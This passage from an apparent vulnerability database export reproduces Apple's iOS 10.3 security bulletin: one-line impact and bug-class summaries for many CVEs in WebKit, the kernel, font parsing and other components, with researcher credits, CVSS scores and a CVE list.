maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2471: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**WebKit JavaScript Bindings**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2442: lokihardt of Google Project Zero\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Closing a window while paused in the debugger may lead to unexpected application termination\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2377: Vicki Pfau\n\n**WebKit Web Inspector**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2405: Apple\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n\n**WebKit**\n\nWe would like to acknowledge Yosuke HASEGAWA of Secure Sky Technology Inc. for their assistance.\n\n**Safari**\n\nWe would like to acknowledge Flyin9 (ZhenHui Lee) for their assistance.\n\n**Settings**\n\nWe would like to acknowledge Adi Sharabani and Yair Amit of Skycure for their assistance.\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of iOS 10.3", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3619", "CVE-2016-9642", "CVE-2016-9643", "CVE-2017-2364", "CVE-2017-2367", "CVE-2017-2376", "CVE-2017-2377", "CVE-2017-2378", "CVE-2017-2379", "CVE-2017-2380", "CVE-2017-2384", "CVE-2017-2386", "CVE-2017-2389", "CVE-2017-2390", "CVE-2017-2393", "CVE-2017-2394", "CVE-2017-2395", "CVE-2017-2396", "CVE-2017-2397", "CVE-2017-2398", "CVE-2017-2399", "CVE-2017-2400", "CVE-2017-2401", "CVE-2017-2404", "CVE-2017-2405", "CVE-2017-2406", "CVE-2017-2407", "CVE-2017-2412", "CVE-2017-2414", "CVE-2017-2415", "CVE-2017-2416", "CVE-2017-2417", "CVE-2017-2419", "CVE-2017-2423", "CVE-2017-2424", "CVE-2017-2428", "CVE-2017-2430", "CVE-2017-2432", "CVE-2017-2433", "CVE-2017-2434", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2440", "CVE-2017-2441", "CVE-2017-2442", "CVE-2017-2444", "CVE-2017-2445", "CVE-2017-2446", "CVE-2017-2447", "CVE-2017-2448", "CVE-2017-2450", "CVE-2017-2451", "CVE-2017-2452", "CVE-2017-2453", "CVE-2017-2454", "CVE-2017-2455", "CVE-2017-2456", "CVE-2017-2457", "CVE-2017-2458", "CVE-2017-2459", "CVE-2017-2460", "CVE-2017-2461", "CVE-2017-2462", "CVE-2017-2463", "CVE-2017-2464", "CVE-2017-2465", "CVE-2017-2466", "CVE-2017-2467", "CVE-2017-2468", "CVE-2017-2469", "CVE-2017-2470", "CVE-2017-2471", "CVE-2017-2472", "CVE-2017-2473", "CVE-2017-2474", "CVE-2017-2475", "CVE-2017-2476", "CVE-2017-2478", "CVE-2017-2479", "CVE-2017-2480", "CVE-2017-2481", "CVE-2017-2482", "CVE-2017-2483", "CVE-2017-2484", "CVE-2017-2485", "CVE-2017-2486", "CVE-2017-2487", "CVE-2017-2490", "CVE-2017-2491", "CVE-2017-2492", "CVE-2017-2493", "CVE-2017-5029", "CVE-2017-6976"], "modified": "2017-03-27T00:00:00", "id": "APPLE:218B65DBD8E421B171C5CC7639BE893D", "href": "https://support.apple.com/kb/HT207617", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:31", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2457: lokihardt of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Jeonghoon Shin, Natalie Silvanovich of Google Project Zero\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to unexpectedly unenforced Content Security Policy\n\nDescription: An access issue existed in Content Security Policy. This issue was addressed through improved access restrictions.\n\nCVE-2017-2419: Nicolai Gr\u00f8dum of Cisco Systems\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may result in the disclosure of process memory\n\nDescription: An information disclosure issue existed in the processing of OpenGL shaders. This issue was addressed through improved memory management.\n\nCVE-2017-2424: Paul Thomson (using the GLFuzz tool) of the Multicore Programming Group, Imperial College London\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2433: Apple\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: Multiple validation issues existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2364: lokihardt of Google Project 